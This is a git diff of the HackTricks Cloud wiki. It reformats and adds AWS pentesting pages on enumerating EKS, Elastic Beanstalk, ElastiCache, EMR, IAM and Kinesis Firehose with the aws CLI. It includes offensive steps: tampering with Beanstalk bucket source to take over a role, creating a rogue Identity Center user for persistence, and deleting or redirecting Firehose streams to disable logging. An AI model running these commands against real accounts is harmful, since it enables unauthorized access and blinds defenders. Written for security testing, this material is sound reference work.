- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md new file mode 100644 index 000000000..3e34a3cd4 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md @@ -0,0 +1,46 @@ +# AWS - EKS Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## EKS + +Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. + +Key aspects of Amazon EKS include: + +1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. +2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. +3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. +4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. + +#### Enumeration + +```bash +aws eks list-clusters +aws eks describe-cluster --name +# Check for endpointPublicAccess and publicAccessCidrs + +aws eks list-fargate-profiles --cluster-name +aws eks describe-fargate-profile --cluster-name --fargate-profile-name + +aws eks list-identity-provider-configs --cluster-name +aws eks describe-identity-provider-config --cluster-name --identity-provider-config + +aws eks list-nodegroups --cluster-name +aws eks describe-nodegroup --cluster-name --nodegroup-name + +aws eks list-updates --name +aws eks describe-update --name --update-id +``` + +#### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-eks-post-exploitation.md +{{#endref}} + +## References + +- [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md similarity index 57% rename from pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md index a2440c8d3..ddb803d1a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md @@ -1,19 +1,6 @@ # AWS - Elastic Beanstalk Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Elastic Beanstalk @@ -23,15 +10,15 @@ Elastic Beanstalk provides a simple and flexible way to **deploy your applicatio The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2: -{% content-ref url="aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} +{{#ref}} +aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ +{{#endref}} Moreover, if Docker is used, it’s possible to use **ECS**. -{% content-ref url="aws-eks-enum.md" %} -[aws-eks-enum.md](aws-eks-enum.md) -{% endcontent-ref %} +{{#ref}} +aws-eks-enum.md +{{#endref}} ### Application & Environments @@ -39,15 +26,15 @@ In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" #### Application -* An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity. -* When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources. -* You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments. +- An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity. +- When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources. +- You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments. #### Environment -* An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration. -* **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production. -* When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings. +- An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration. +- **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production. +- When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings. ### 2 types of Environments @@ -58,15 +45,15 @@ In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" When creating an App in Beanstalk there are 3 very important security options to choose: -* **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app -* **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**) - * The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier). -* **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role. - * This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) +- **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app +- **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**) + - The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier). +- **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role. + - This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) By default **metadata version 1 is disabled**: -
+
### Exposure @@ -74,15 +61,13 @@ Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticb The **URL** of the created webpage is **`http://-env...elasticbeanstalk.com/`** -{% hint style="warning" %} -If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it - -if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed. -{% endhint %} +> [!WARNING] +> If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it +> +> if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed. ### Enumeration -{% code overflow="wrap" %} ```bash # Find S3 bucket ACCOUNT_NUMBER= @@ -100,43 +85,29 @@ aws elasticbeanstalk describe-instances-health --environment-name # G # Get events aws elasticbeanstalk describe-events ``` -{% endcode %} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md" %} -[aws-elastic-beanstalk-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-elastic-beanstalk-persistence.md" %} -[aws-elastic-beanstalk-persistence.md](../aws-persistence/aws-elastic-beanstalk-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-elastic-beanstalk-persistence.md +{{#endref}} ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md" %} -[aws-elastic-beanstalk-privesc.md](../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md" %} -[aws-elastic-beanstalk-post-exploitation.md](../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md new file mode 100644 index 000000000..69561eb89 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md @@ -0,0 +1,45 @@ +# AWS - ElastiCache + +{{#include ../../../banners/hacktricks-training.md}} + +## ElastiCache + +AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**. + +### Enumeration + +```bash +# ElastiCache clusters +## Check the SecurityGroups to later check who can access +## In Redis clusters: Check AuthTokenEnabled to see if you need password +## In memcache clusters: You can find the URL to connect +aws elasticache describe-cache-clusters + +# List all ElastiCache replication groups +## Find here the accesible URLs for Redis clusters +aws elasticache describe-replication-groups + +#List all ElastiCache parameter groups +aws elasticache describe-cache-parameter-groups + +#List all ElastiCache security groups +## If this gives an error it's because it's using SGs from EC2 +aws elasticache describe-cache-security-groups + +#List all ElastiCache subnet groups +aws elasticache describe-cache-subnet-groups + +# Get snapshots +aws elasticache describe-snapshots + +# Get users and groups +aws elasticache describe-user-groups +aws elasticache describe-users + +# List ElastiCache events +aws elasticache describe-events +``` + +### Privesc (TODO) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md new file mode 100644 index 000000000..12373e9bd --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md @@ -0,0 +1,60 @@ +# AWS - EMR Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## EMR + +AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. + +Key characteristics include: + +- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: + - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. + - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: + - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. + - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. +- **Encryption in Transit**: Focuses on securing data during transfer. Options include: + - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: + - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. + - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. + +Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: + +- **Hadoop**: + - Might reduce encrypted shuffle using TLS. + - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. +- **Presto** (EMR version 5.6.0+): + - Internal communication between Presto nodes is secured using SSL and TLS. +- **Tez Shuffle Handler**: + - Utilizes TLS for encryption. +- **Spark**: + - Employs TLS for the Akka protocol. + - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. + - External shuffle service is secured with the Simple Authentication Security Layer. + +These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. + +#### Enumeration + +```bash +aws emr list-clusters +aws emr describe-cluster --cluster-id +aws emr list-instances --cluster-id +aws emr list-instance-fleets --cluster-id +aws emr list-steps --cluster-id +aws emr list-notebook-executions +aws emr list-security-configurations +aws emr list-studios #Get studio URLs +``` + +#### Privesc + +{{#ref}} +../aws-privilege-escalation/aws-emr-privesc.md +{{#endref}} + +## References + +- [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md similarity index 66% rename from pentesting-cloud/aws-security/aws-services/aws-iam-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md index 40a1e3b6d..618b98e7a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md @@ -1,43 +1,30 @@ # AWS - IAM, Identity Center & SSO Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## IAM You can find a **description of IAM** in: -{% content-ref url="../aws-basic-information/" %} -[aws-basic-information](../aws-basic-information/) -{% endcontent-ref %} +{{#ref}} +../aws-basic-information/ +{{#endref}} ### Enumeration Main permissions needed: -* `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion` -* `iam:ListRoles` -* `iam:ListUsers` -* `iam:ListGroups` -* `iam:ListGroupsForUser` -* `iam:ListAttachedUserPolicies` -* `iam:ListAttachedRolePolicies` -* `iam:ListAttachedGroupPolicies` -* `iam:ListUserPolicies` and `iam:GetUserPolicy` -* `iam:ListGroupPolicies` and `iam:GetGroupPolicy` -* `iam:ListRolePolicies` and `iam:GetRolePolicy` +- `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion` +- `iam:ListRoles` +- `iam:ListUsers` +- `iam:ListGroups` +- `iam:ListGroupsForUser` +- `iam:ListAttachedUserPolicies` +- `iam:ListAttachedRolePolicies` +- `iam:ListAttachedGroupPolicies` +- `iam:ListUserPolicies` and `iam:GetUserPolicy` +- `iam:ListGroupPolicies` and `iam:GetGroupPolicy` +- `iam:ListRolePolicies` and `iam:GetRolePolicy` ```bash # All IAMs @@ -111,12 +98,10 @@ If you are interested in your own permissions but you don't have access to query The tool [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is just a bash script that will run using the indicated profile all the **`list*`, `describe*`, `get*`** actions it can find using `aws` cli help messages and **return the successful executions**. -{% code overflow="wrap" %} ```bash # Bruteforce permissions bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt ``` -{% endcode %} #### bf-aws-perms-simulate @@ -131,33 +116,27 @@ python3 aws_permissions_checker.py --profile [--arn ] If you found **some permissions your user has**, and you think that they are being granted by a **managed AWS role** (and not by a custom one). You can use the tool [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) to check all the **AWS managed roles that grants the permissions you discovered that you have**. -{% code overflow="wrap" %} ```bash # Run example with my profile python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt ``` -{% endcode %} -{% hint style="warning" %} -It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example. -{% endhint %} +> [!WARNING] +> It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example. #### Cloudtrail2IAM [**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is a Python tool that analyses **AWS CloudTrail logs to extract and summarize actions** done by everyone or just an specific user or role. The tool will **parse every cloudtrail log from the indicated bucket**. -{% code overflow="wrap" %} ```bash git clone https://github.com/carlospolop/Cloudtrail2IAM cd Cloudtrail2IAM pip install -r requirements.txt python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS] ``` -{% endcode %} -{% hint style="warning" %} -If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who. -{% endhint %} +> [!WARNING] +> If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who. #### enumerate-iam @@ -165,11 +144,9 @@ To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://git (In my experience the **tool hangs at some point**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) to try to fix that). -{% hint style="warning" %} -In my experience this tool is like the previous one but working worse and checking less permissions -{% endhint %} +> [!WARNING] +> In my experience this tool is like the previous one but working worse and checking less permissions -{% code overflow="wrap" %} ```bash # Install tool git clone git@github.com:andresriancho/enumerate-iam.git @@ -186,7 +163,6 @@ cd .. # Enumerate permissions python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--session-token SESSION_TOKEN] [--region REGION] ``` -{% endcode %} #### weirdAAL @@ -218,9 +194,9 @@ python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions #### Hardening Tools to BF permissions -{% tabs %} -{% tab title="CloudSploit" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="CloudSploit" }} + ```bash # Export env variables ./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json @@ -231,10 +207,11 @@ jq 'map(select(.status | contains("UNKNOWN") | not))' /tmp/out-cloudsploit.json # Get services by regions jq 'group_by(.region) | map({(.[0].region): ([map((.resource | split(":"))[2]) | unique])})' ~/Desktop/pentests/cere/greybox/core-dev-dev-cloudsploit-filtered.json ``` -{% endcode %} -{% endtab %} -{% tab title="SteamPipe" %} +{{#endtab }} + +{{#tab name="SteamPipe" }} + ```bash # https://github.com/turbot/steampipe-mod-aws-insights steampipe check all --export=json @@ -243,8 +220,9 @@ steampipe check all --export=json # In this case you cannot output to JSON, so heck it in the dashboard steampipe dashboard ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} #### \ @@ -252,37 +230,37 @@ Neither of the previous tools is capable of checking close to all permissions, s ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md" %} -[aws-iam-and-sts-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md +{{#endref}} ### Privilege Escalation In the following page you can check how to **abuse IAM permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-iam-privesc.md" %} -[aws-iam-privesc.md](../aws-privilege-escalation/aws-iam-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-iam-privesc.md +{{#endref}} ### IAM Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-iam-post-exploitation.md" %} -[aws-iam-post-exploitation.md](../aws-post-exploitation/aws-iam-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-iam-post-exploitation.md +{{#endref}} ### IAM Persistence -{% content-ref url="../aws-persistence/aws-iam-persistence.md" %} -[aws-iam-persistence.md](../aws-persistence/aws-iam-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-iam-persistence.md +{{#endref}} ## IAM Identity Center You can find a **description of IAM Identity Center** in: -{% content-ref url="../aws-basic-information/" %} -[aws-basic-information](../aws-basic-information/) -{% endcontent-ref %} +{{#ref}} +../aws-basic-information/ +{{#endref}} ### Connect via SSO with CLI @@ -301,15 +279,14 @@ sso_region = us-east-1 The main elements of the Identity Center are: -* Users and groups -* Permission Sets: Have policies attached -* AWS Accounts +- Users and groups +- Permission Sets: Have policies attached +- AWS Accounts Then, relationships are created so users/groups have Permission Sets over AWS Account. -{% hint style="info" %} -Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there). -{% endhint %} +> [!NOTE] +> Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there). ```bash # Check if IAM Identity Center is used @@ -390,51 +367,36 @@ external_id = 123456 ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md" %} -[aws-identity-center-and-sso-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md +{{#endref}} ### Privilege Escalation -{% content-ref url="../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md" %} -[aws-sso-and-identitystore-privesc.md](../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md" %} -[aws-sso-and-identitystore-post-exploitation.md](../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md +{{#endref}} ### Persistence #### Create a user an assign permissions to it -{% code overflow="wrap" %} ```bash # Create user identitystore:CreateUser aws identitystore create-user --identity-store-id --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc ## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password ``` -{% endcode %} -* Create a group and assign it permissions and set on it a controlled user -* Give extra permissions to a controlled user or group -* By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center. +- Create a group and assign it permissions and set on it a controlled user +- Give extra permissions to a controlled user or group +- By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center. - However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html). + However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html). -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md new file mode 100644 index 000000000..207c1d53f --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md @@ -0,0 +1,51 @@ +# AWS - Kinesis Data Firehose Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Kinesis Data Firehose + +Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. + +The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. + +### Enumeration + +```bash +# Get delivery streams +aws firehose list-delivery-streams + +# Get stream info +aws firehose describe-delivery-stream --delivery-stream-name +## Get roles +aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN +``` + +## Post-exploitation / Defense Bypass + +In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly. + +### firehose:DeleteDeliveryStream + +``` +aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete +``` + +### firehose:UpdateDestination + +``` +aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id +``` + +### firehose:PutRecord | firehose:PutRecordBatch + +``` +aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}' + +aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json +``` + +## References + +- [https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html) + +{{#include 